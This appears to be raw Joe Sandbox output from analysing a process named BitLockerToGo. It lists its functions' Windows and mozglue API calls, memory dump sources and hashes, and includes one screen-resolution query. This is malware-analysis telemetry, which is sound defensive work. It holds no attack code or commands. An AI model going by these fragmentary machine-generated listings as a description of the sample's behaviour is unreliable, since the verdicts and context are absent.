                                                                                                                                                                • Opcode ID: a247a95781e486110b4e3fddc0d4eafb6a757cc3e05ce1bd88746c4306bdb4f9
                                                                                                                                                                • Instruction ID: 4fc232beef246de0901620e3a00ee6b6719fcb7ebab52ecfe5d838f6c21901fe
                                                                                                                                                                • Opcode Fuzzy Hash: a247a95781e486110b4e3fddc0d4eafb6a757cc3e05ce1bd88746c4306bdb4f9
                                                                                                                                                                • Instruction Fuzzy Hash: 0941D471B003198FDF109FBDD898B6A7AB5EF4A348F14002AE92997745FB719805CBE1
                                                                                                                                                                APIs
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC87EA7
                                                                                                                                                                • malloc.MOZGLUE(00000001), ref: 6CC87EB3
                                                                                                                                                                  • Part of subcall function 6CC8CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC8CB49
                                                                                                                                                                  • Part of subcall function 6CC8CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC8CBB6
                                                                                                                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC87EC4
                                                                                                                                                                • mozalloc_abort.MOZGLUE(?), ref: 6CC87F19
                                                                                                                                                                • malloc.MOZGLUE(?), ref: 6CC87F36
                                                                                                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC87F4D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                • String ID: d
                                                                                                                                                                • API String ID: 204725295-2564639436
                                                                                                                                                                • Opcode ID: 1c2ef1ff96d01466b9ff06a25d7cd8df8016abac1bb39b36b33ee690152a2f5a
                                                                                                                                                                • Instruction ID: 5076c2e5fa9fb0fe0dc2710961981fa6859a483cbf57034429698aebcd881f23
                                                                                                                                                                • Opcode Fuzzy Hash: 1c2ef1ff96d01466b9ff06a25d7cd8df8016abac1bb39b36b33ee690152a2f5a
                                                                                                                                                                • Instruction Fuzzy Hash: C031F671E0078897DB009B68DC445FFB778EF9621CF045629ED595B612FB30A9C8C390
                                                                                                                                                                APIs
                                                                                                                                                                • CreateDCA.GDI32(03540598,00000000,00000000,00000000), ref: 030187F5
                                                                                                                                                                • GetDeviceCaps.GDI32(?,00000008), ref: 03018804
                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000A), ref: 03018813
                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 03018822
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,03020E28,00000000,?), ref: 0301882F
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03018836
                                                                                                                                                                • wsprintfA.USER32 ref: 03018850
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDeviceHeap$AllocateCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                • String ID: %dx%d
                                                                                                                                                                • API String ID: 81802983-2206825331
                                                                                                                                                                • Opcode ID: 5424a6806343cd756fb473d6aae5686e9d1709818c9f5e67c5ca69b785512825
                                                                                                                                                                • Instruction ID: ee715f4a4e7f8b61b9813573491aa7619e1e228cb42bb289c7e44f6cd1b2d8c7
                                                                                                                                                                • Opcode Fuzzy Hash: 5424a6806343cd756fb473d6aae5686e9d1709818c9f5e67c5ca69b785512825
                                                                                                                                                                • Instruction Fuzzy Hash: 3F2124B5A81204EFDB14EFD4ED49FAEBBB8FB48711F108119F605A7284C7799901CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6CC83CCC), ref: 6CC83EEE
                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC83FDC
                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6CC83CCC), ref: 6CC84006
                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC840A1
                                                                                                                                                                • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC83CCC), ref: 6CC840AF
                                                                                                                                                                • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC83CCC), ref: 6CC840C2
                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC84134
                                                                                                                                                                • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CC83CCC), ref: 6CC84143
                                                                                                                                                                • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CC83CCC), ref: 6CC84157
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3680524765-0
                                                                                                                                                                • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                • Instruction ID: bb15a149c7c9c123707d6f53443e47e4f70018f60a39ad528ad2063fd35a500b
                                                                                                                                                                • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                • Instruction Fuzzy Hash: 6AA180B1A01215CFDB40CF69C88075ABBB5FF49318F294599D909AF742E771E886CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCC8273), ref: 6CCC9D65
                                                                                                                                                                • free.MOZGLUE(6CCC8273,?), ref: 6CCC9D7C
                                                                                                                                                                • free.MOZGLUE(?,?), ref: 6CCC9D92
                                                                                                                                                                • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CCC9E0F
                                                                                                                                                                • free.MOZGLUE(6CCC946B,?,?), ref: 6CCC9E24
                                                                                                                                                                • free.MOZGLUE(?,?,?), ref: 6CCC9E3A
                                                                                                                                                                • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CCC9EC8
                                                                                                                                                                • free.MOZGLUE(6CCC946B,?,?,?), ref: 6CCC9EDF
                                                                                                                                                                • free.MOZGLUE(?,?,?,?), ref: 6CCC9EF5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 956590011-0
                                                                                                                                                                • Opcode ID: 70da7748037fb62477fa447ff36b3ef74938e404866cca64c7f9f09bd786e08b
                                                                                                                                                                • Instruction ID: 94c05a9d6b217c5d7138db1ffac4eac0c32c28a4d8d2a11a639b3086f3c0082d
                                                                                                                                                                • Opcode Fuzzy Hash: 70da7748037fb62477fa447ff36b3ef74938e404866cca64c7f9f09bd786e08b
                                                                                                                                                                • Instruction Fuzzy Hash: 0B718FB0A09B419BD712CF18C48055BF3F5FF99319B44965DE89A5BB01FB31E885CB82
                                                                                                                                                                APIs
                                                                                                                                                                • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CCCDDCF
                                                                                                                                                                  • Part of subcall function 6CCAFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCAFA4B
                                                                                                                                                                  • Part of subcall function 6CCC90E0: free.MOZGLUE(?,00000000,?,?,6CCCDEDB), ref: 6CCC90FF
                                                                                                                                                                  • Part of subcall function 6CCC90E0: free.MOZGLUE(?,00000000,?,?,6CCCDEDB), ref: 6CCC9108
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCCDE0D
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CCCDE41
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCCDE5F
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCCDEA3
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCCDEE9
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CCBDEFD,?,6CC84A68), ref: 6CCCDF32
                                                                                                                                                                  • Part of subcall function 6CCCDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCCDB86
                                                                                                                                                                  • Part of subcall function 6CCCDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCCDC0E
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CCBDEFD,?,6CC84A68), ref: 6CCCDF65
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CCCDF80
                                                                                                                                                                  • Part of subcall function 6CC95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC95EDB
                                                                                                                                                                  • Part of subcall function 6CC95E90: memset.VCRUNTIME140(6CCD7765,000000E5,55CCCCCC), ref: 6CC95F27
                                                                                                                                                                  • Part of subcall function 6CC95E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC95FB2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 112305417-0
                                                                                                                                                                • Opcode ID: 4b7308c172aff6686e87bbcd2b285b1b3b587499389ba5fc24ffa7df1aaac11b
                                                                                                                                                                • Instruction ID: 64ff17bad96b06f54aececb114b029e9b5a6c166c7f81b9c0f213fcfbe60ff6a
                                                                                                                                                                • Opcode Fuzzy Hash: 4b7308c172aff6686e87bbcd2b285b1b3b587499389ba5fc24ffa7df1aaac11b
                                                                                                                                                                • Instruction Fuzzy Hash: E251C172B416019BD7219B29D8806AEB3B2BF95308F96051DD85A53F00FB31F95ACB93
                                                                                                                                                                APIs
                                                                                                                                                                • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5D32
                                                                                                                                                                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5D62
                                                                                                                                                                • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5D6D
                                                                                                                                                                • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5D84
                                                                                                                                                                • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5DA4
                                                                                                                                                                • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5DC9
                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 6CCD5DDB
                                                                                                                                                                • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5E00
                                                                                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CCD5C8C,?,6CCAE829), ref: 6CCD5E45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2325513730-0
                                                                                                                                                                • Opcode ID: d890460b8d347dcf9a25c8797e759c94ad0b8cf7062372e0c99871f5b518ee8e
                                                                                                                                                                • Instruction ID: 0b583adb527c5e7c82528690a6bd402076caddf6cf6d567101b5a3d6bd491f64
                                                                                                                                                                • Opcode Fuzzy Hash: d890460b8d347dcf9a25c8797e759c94ad0b8cf7062372e0c99871f5b518ee8e
                                                                                                                                                                • Instruction Fuzzy Hash: 3041A2707002059FDB00EFA9C8D8AAE77B9FF89354F1540A8E61697781EB34E805CB61
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC731A7), ref: 6CCACDDD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                • API String ID: 4275171209-2186867486
                                                                                                                                                                • Opcode ID: 8278ec484bb45cb8f19bfb02566ad5c3f1719d924a3eeff075fddf2bd3761492
                                                                                                                                                                • Instruction ID: fe8c1617ed8786d9e09f08a94c13fdad596b94cd82ac50944c2c2007c6e26b4c
                                                                                                                                                                • Opcode Fuzzy Hash: 8278ec484bb45cb8f19bfb02566ad5c3f1719d924a3eeff075fddf2bd3761492
                                                                                                                                                                • Instruction Fuzzy Hash: 7831C5707402065BFF00AFE98C59BAE7B75BF45758F304019F620ABA80FB72D5028BA1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CC7F100: LoadLibraryW.KERNEL32(shell32,?,6CCED020), ref: 6CC7F122
                                                                                                                                                                  • Part of subcall function 6CC7F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC7F132
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000012), ref: 6CC7ED50
                                                                                                                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC7EDAC
                                                                                                                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC7EDCC
                                                                                                                                                                • CreateFileW.KERNEL32 ref: 6CC7EE08
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CC7EE27
                                                                                                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC7EE32
                                                                                                                                                                  • Part of subcall function 6CC7EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC7EBB5
                                                                                                                                                                  • Part of subcall function 6CC7EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CCAD7F3), ref: 6CC7EBC3
                                                                                                                                                                  • Part of subcall function 6CC7EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CCAD7F3), ref: 6CC7EBD6
                                                                                                                                                                Strings
                                                                                                                                                                • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC7EDC1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                • API String ID: 1980384892-344433685
                                                                                                                                                                • Opcode ID: 5ca224dd9fb70dea8747653ed8f78f01a7056a5dfe6706e8f6abff9fc7f19019
                                                                                                                                                                • Instruction ID: b066ac293845cb7268941a8e305ab6e713cc5d570caaa87b8a4838617da3ec6e
                                                                                                                                                                • Opcode Fuzzy Hash: 5ca224dd9fb70dea8747653ed8f78f01a7056a5dfe6706e8f6abff9fc7f19019
                                                                                                                                                                • Instruction Fuzzy Hash: 4F51C072D052048FDB20DF69D9846EEBBB0EF5A318F44892DE8556B740F7306989C7B2
                                                                                                                                                                APIs
                                                                                                                                                                • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCEA565
                                                                                                                                                                  • Part of subcall function 6CCEA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCEA4BE
                                                                                                                                                                  • Part of subcall function 6CCEA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CCEA4D6
                                                                                                                                                                • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCEA65B
                                                                                                                                                                • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CCEA6B6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                • String ID: 0$z
                                                                                                                                                                • API String ID: 310210123-2584888582
                                                                                                                                                                • Opcode ID: 4cec86c190af283f4a85dd816fac7f3dee1bc705c07f32c790d577c0ebd28d18
                                                                                                                                                                • Instruction ID: 278e91970a419924da68349a7b1e911b3a26b3458488ae4848944b87aa40f225
                                                                                                                                                                • Opcode Fuzzy Hash: 4cec86c190af283f4a85dd816fac7f3dee1bc705c07f32c790d577c0ebd28d18
                                                                                                                                                                • Instruction Fuzzy Hash: 044137719097459FC341DF28C480A9BBBF9BFCA354F408A2EF49987650EB30D649CB92
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCAAB89: EnterCriticalSection.KERNEL32(6CCFE370,?,?,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284), ref: 6CCAAB94
                                                                                                                                                                  • Part of subcall function 6CCAAB89: LeaveCriticalSection.KERNEL32(6CCFE370,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CCAABD1
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC84A68), ref: 6CCB945E
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCB9470
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCB9482
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CCB949F
                                                                                                                                                                Strings
                                                                                                                                                                • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CCB947D
                                                                                                                                                                • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CCB946B
                                                                                                                                                                • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CCB9459
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                • API String ID: 4042361484-1628757462
                                                                                                                                                                • Opcode ID: 963e0f66573318e3c07c1c873e6ae660b3f7d684175af05f15b9e2c67a0dab2b
                                                                                                                                                                • Instruction ID: 56feb76dde26b6a8a86a612654bd1bb765d98e93a5942c22a2139bd887b33dfc
